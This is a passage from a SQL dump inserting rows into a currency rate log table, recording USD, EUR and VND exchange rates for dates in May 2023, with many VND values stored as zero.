(3837, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3838, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3839, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3840, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3841, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-13'),
(3842, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3843, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-13'),
(3844, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-13'),
(3845, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-13'),
(3846, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-13'),
(3847, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3848, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3849, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3850, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3851, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3852, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3853, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3854, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3855, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3856, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3857, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3858, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3859, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3860, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3861, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3862, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3863, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3864, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3865, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3866, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3867, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3868, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3869, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3870, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3871, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3872, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3873, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3874, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3875, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3876, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3877, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3878, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3879, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3880, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3881, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3882, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3883, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3884, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3885, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3886, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3887, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3888, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3889, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-14'),
(3890, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3891, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-14'),
(3892, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-14'),
(3893, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-14'),
(3894, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-14'),
(3895, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3896, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3897, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3898, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3899, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3900, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3901, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3902, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3903, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3904, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3905, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3906, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3907, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3908, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3909, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3910, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3911, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3912, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3913, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3914, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3915, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3916, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3917, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3918, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3919, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3920, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3921, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3922, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3923, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3924, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3925, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3926, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3927, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3928, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3929, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3930, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3931, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3932, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3933, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3934, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3935, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3936, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3937, 1, 'USD', 0.000000, 2, 'EUR', 0.918110, '2023-05-15'),
(3938, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3939, 2, 'EUR', 0.000000, 1, 'USD', 1.089200, '2023-05-15'),
(3940, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-15'),
(3941, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-15'),
(3942, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-15'),
(3943, 1, 'USD', 1.000000, 2, 'EUR', 0.918110, '2023-05-16'),
(3944, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3945, 2, 'EUR', 1.000000, 1, 'USD', 1.089200, '2023-05-16'),
(3946, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3947, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3948, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3949, 1, 'USD', 0.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3950, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3951, 2, 'EUR', 0.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3952, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3953, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3954, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3955, 1, 'USD', 1.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3956, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3957, 2, 'EUR', 1.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3958, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3959, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3960, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3961, 1, 'USD', 0.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3962, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3963, 2, 'EUR', 0.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3964, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3965, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3966, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3967, 1, 'USD', 1.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3968, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3969, 2, 'EUR', 1.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3970, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3971, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3972, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3973, 1, 'USD', 0.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3974, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3975, 2, 'EUR', 0.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3976, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3977, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3978, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3979, 1, 'USD', 1.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3980, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3981, 2, 'EUR', 1.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3982, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3983, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3984, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3985, 1, 'USD', 0.000000, 2, 'EUR', 0.919460, '2023-05-16'),
(3986, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3987, 2, 'EUR', 0.000000, 1, 'USD', 1.087600, '2023-05-16'),
(3988, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-16'),
(3989, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-16'),
(3990, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-16'),
(3991, 1, 'USD', 1.000000, 2, 'EUR', 0.919460, '2023-05-17'),
(3992, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(3993, 2, 'EUR', 1.000000, 1, 'USD', 1.087600, '2023-05-17'),
(3994, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(3995, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-17'),
(3996, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(3997, 1, 'USD', 0.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(3998, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(3999, 2, 'EUR', 0.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4000, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4001, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4002, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4003, 1, 'USD', 1.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4004, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4005, 2, 'EUR', 1.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4006, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4007, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4008, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4009, 1, 'USD', 0.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4010, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4011, 2, 'EUR', 0.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4012, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4013, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4014, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4015, 1, 'USD', 1.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4016, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4017, 2, 'EUR', 1.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4018, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4019, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4020, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4021, 1, 'USD', 0.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4022, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4023, 2, 'EUR', 0.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4024, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4025, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4026, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4027, 1, 'USD', 1.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4028, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4029, 2, 'EUR', 1.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4030, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4031, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4032, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4033, 1, 'USD', 0.000000, 2, 'EUR', 0.919030, '2023-05-17'),
(4034, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4035, 2, 'EUR', 0.000000, 1, 'USD', 1.088100, '2023-05-17'),
(4036, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-17'),
(4037, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-17'),
(4038, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-17'),
(4039, 1, 'USD', 1.000000, 2, 'EUR', 0.919030, '2023-05-18'),
(4040, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4041, 2, 'EUR', 1.000000, 1, 'USD', 1.088100, '2023-05-18'),
(4042, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4043, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4044, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4045, 1, 'USD', 0.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4046, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4047, 2, 'EUR', 0.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4048, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4049, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4050, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4051, 1, 'USD', 1.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4052, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4053, 2, 'EUR', 1.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4054, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4055, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4056, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4057, 1, 'USD', 0.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4058, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4059, 2, 'EUR', 0.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4060, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4061, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4062, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4063, 1, 'USD', 1.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4064, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4065, 2, 'EUR', 1.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4066, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4067, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4068, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4069, 1, 'USD', 0.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4070, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4071, 2, 'EUR', 0.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4072, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4073, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4074, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4075, 1, 'USD', 1.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4076, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4077, 2, 'EUR', 1.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4078, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4079, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4080, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4081, 1, 'USD', 0.000000, 2, 'EUR', 0.923450, '2023-05-18'),
(4082, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4083, 2, 'EUR', 0.000000, 1, 'USD', 1.082900, '2023-05-18'),
(4084, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-18'),
(4085, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-18'),
(4086, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-18'),
(4087, 1, 'USD', 1.000000, 2, 'EUR', 0.923450, '2023-05-19'),
(4088, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4089, 2, 'EUR', 1.000000, 1, 'USD', 1.082900, '2023-05-19'),
(4090, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4091, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4092, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4093, 1, 'USD', 0.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4094, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4095, 2, 'EUR', 0.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4096, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4097, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4098, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4099, 1, 'USD', 1.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4100, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4101, 2, 'EUR', 1.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4102, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4103, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4104, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4105, 1, 'USD', 0.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4106, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4107, 2, 'EUR', 0.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4108, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4109, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4110, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4111, 1, 'USD', 1.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4112, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4113, 2, 'EUR', 1.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4114, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4115, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4116, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4117, 1, 'USD', 0.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4118, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4119, 2, 'EUR', 0.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4120, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4121, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4122, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4123, 1, 'USD', 1.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4124, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4125, 2, 'EUR', 1.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4126, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4127, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4128, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4129, 1, 'USD', 0.000000, 2, 'EUR', 0.924810, '2023-05-19'),
(4130, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4131, 2, 'EUR', 0.000000, 1, 'USD', 1.081300, '2023-05-19'),
(4132, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-19'),
(4133, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-19'),
(4134, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-19'),
(4135, 1, 'USD', 1.000000, 2, 'EUR', 0.924810, '2023-05-20'),
(4136, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4137, 2, 'EUR', 1.000000, 1, 'USD', 1.081300, '2023-05-20'),
(4138, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4139, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4140, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4141, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4142, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4143, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4144, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4145, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4146, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4147, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4148, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4149, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4150, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4151, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4152, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4153, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4154, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4155, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4156, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4157, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4158, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4159, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4160, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4161, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4162, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4163, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4164, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4165, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4166, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4167, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4168, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-20');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(4169, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4170, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4171, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4172, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4173, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4174, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4175, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4176, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4177, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-20'),
(4178, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4179, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-20'),
(4180, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-20'),
(4181, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-20'),
(4182, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-20'),
(4183, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4184, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4185, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-21'),
